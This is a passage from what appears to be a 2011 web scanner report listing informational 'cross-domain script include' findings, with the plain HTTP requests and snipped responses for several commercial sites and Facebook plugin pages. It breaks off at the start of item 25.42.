HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:33:04 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16336

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
</script>
<script src="http://www.skichalets.co.uk/top/Crossfader.js" type="text/javascript"></script>
...[SNIP]...
25.27. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Jamaica%20Resort%20holidays/105

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /luxury%20Jamaica%20Resort%20holidays/105 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:34:36 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14276

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
</script>
<script src="http://www.skichalets.co.uk/top/Crossfader.js" type="text/javascript"></script>
...[SNIP]...
25.28. http://www.clone-systems.com/ecommerce/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ecommerce/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:47:46 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; expires=Sun, 08-May-2011 00:47:46 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 28692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...
25.29. http://www.clone-systems.com/ecommerce/cart.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/cart.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ecommerce/cart.php?suggest=0 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RECENTLY_VIEWED_PRODUCTS=8; SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; STORE_VISITOR=1; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:56:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...
25.30. http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/Penetration-Testing/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ecommerce/categories/Penetration-Testing/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RECENTLY_VIEWED_PRODUCTS=8; SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; STORE_VISITOR=1; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:14:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 22548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...
25.31. http://www.clone-systems.com/ecommerce/products/Penetration-Testing-On-Demand.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/products/Penetration-Testing-On-Demand.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ecommerce/products/Penetration-Testing-On-Demand.html HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RECENTLY_VIEWED_PRODUCTS=8; SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; STORE_VISITOR=1; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:14:32 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: RECENTLY_VIEWED_PRODUCTS=8; expires=Mon, 06-Jun-2011 01:14:32 GMT; path=/ecommerce/; domain=.clone-systems.com
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 33500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=xa-4aa4857d5e87e10e"></script>
...[SNIP]...
25.32. https://www.clone-systems.com/ecommerce/checkout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /ecommerce/checkout.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ecommerce/checkout.php HTTP/1.1
Host: www.clone-systems.com
Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/cart.php?suggest=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RECENTLY_VIEWED_PRODUCTS=8; SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; STORE_VISITOR=1; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:56:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 72177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
25.33. https://www.clone-systems.com/ecommerce/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /ecommerce/login.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ecommerce/login.php?action=reset_password HTTP/1.1
Host: www.clone-systems.com
Connection: keep-alive
Referer: https://www.clone-systems.com/ecommerce/checkout.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RECENTLY_VIEWED_PRODUCTS=8; SHOP_SESSION_TOKEN=qs1om4bp16nlerqj0n7otjneq3; STORE_VISITOR=1; CMSSESSIDe4d04fcf=eo21307v4qsv52mm0588i4v2r1

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:56:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 19573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
...[SNIP]...
25.34. http://www.compliancepoint.com/sub_serv_isc_pci.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.compliancepoint.com
Path:   /sub_serv_isc_pci.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sub_serv_isc_pci.asp?gclid=CJu4wszV1KgCFQ075QodRCyFgQ HTTP/1.1
Host: www.compliancepoint.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 07 May 2011 01:16:34 GMT
X-Powered-By: ASP.NET
Set-Cookie: SITESERVER=ID=e72934c3e090fe010326c542496bd26f; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.compliancepoint.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Length: 17114
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADDBQTC=NKAKGEBDADCKPECBKIOIPJEM; path=/
Cache-control: private

<html>
<head>
<title>CompliancePoint</title>

<link href="menu.css" type=text/css rel=stylesheet />
<link href="style.css" type=text/css rel=stylesheet />
<script src="main.js"></script>
<scrip
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<!-- Share This -->
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=0adb3f43-ad3c-4c7f-9bf8-7997b41d316a&amp;type=website"></script>
...[SNIP]...
25.35. http://www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dynamicperimeter.com
Path:   /download/Intel_Expressway_Tokenization_Broker/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /download/Intel_Expressway_Tokenization_Broker/?partnerref=googletokenization&gclid=CMLLqMvV1KgCFUSo4AodlBcAgw HTTP/1.1
Host: www.dynamicperimeter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:16:02 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: pdpr=googletokenization; Expires=Sun, 08-May-2011 01:16:02 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Length: 29614


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta htt
...[SNIP]...
<meta name="ROBOTS" content="ALL" />
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
   
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
25.36. http://www.eneighborhoods.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.eneighborhoods.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:40:23 GMT
Content-Length: 16989
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCRACBCR=HBFHNDMBEOAHONJPJMPPMKPB; path=/
Cache-control: private
Set-Cookie: TS825c04=b9ea7606891d786e2f985ad797c161079dbfc4768d55116b4dc44124; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta name="verify-v1"
...[SNIP]...
<!-- Begin: 4q.iperceptions.com --><script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=88e4efb6-12417-51be6277-37e0-486e-b85c-2b354ce5bb13&lID=1&loc=4Q-WEB2" type="text/javascript" defer="defer" ></script>
...[SNIP]...
25.37. http://www.expedia.com/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /default.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 69466
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:33:31 GMT
Connection: close
Set-Cookie: ipsnf3=v.3|US|1|511|washington; expires=Sun, 6-May-2012 00:00:01 GMT; path=/; domain=.expedia.com;
Set-Cookie: MC1=GUID=6EAD9261B09A4968ABBC2BAA8521F2DD; expires=Fri, 06-May-2016 07:00:00 GMT; domain=.expedia.com; path=/
Set-Cookie: COOKIECHECK=1; domain=.expedia.com; path=/
Content-Length: 69466


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<COMMENT TITLE="MO
...[SNIP]...
<div class="fb_like">
   <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
25.38. http://www.facebook.com/SocialFollow  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /SocialFollow

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /SocialFollow HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=dh9j6; reg_ext_ref=http%3A%2F%2Fwww.socialfollow.com%2F; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FSocialFollow; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Dpa.82321587255; wd=1066x968

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.49
X-Cnection: close
Date: Fri, 06 May 2011 17:41:49 GMT
Content-Length: 33424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
25.39. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/activity.php?site=www.allatsea.net&width=300&height=300&header=true&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.115.132
X-Cnection: close
Date: Fri, 06 May 2011 21:06:47 GMT
Content-Length: 11652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
25.40. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.73.39
X-Cnection: close
Date: Fri, 06 May 2011 22:33:36 GMT
Content-Length: 6764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
25.41. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13d670d48%26origin%3Dhttp%253A%252F%252Fwww.scmagazineus.com%252Ff25bffff5c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=290&href=http%3A%2F%2Fwww.facebook.com%2Fhome.php%23%2521%2FSCMag&locale=en_US&sdk=joey&show_faces=true&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.231.42
X-Cnection: close
Date: Sat, 07 May 2011 01:50:43 GMT
Content-Length: 16849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
25.42. http://www.firehost.com/secure-hosting/pci  previous  next

Summary

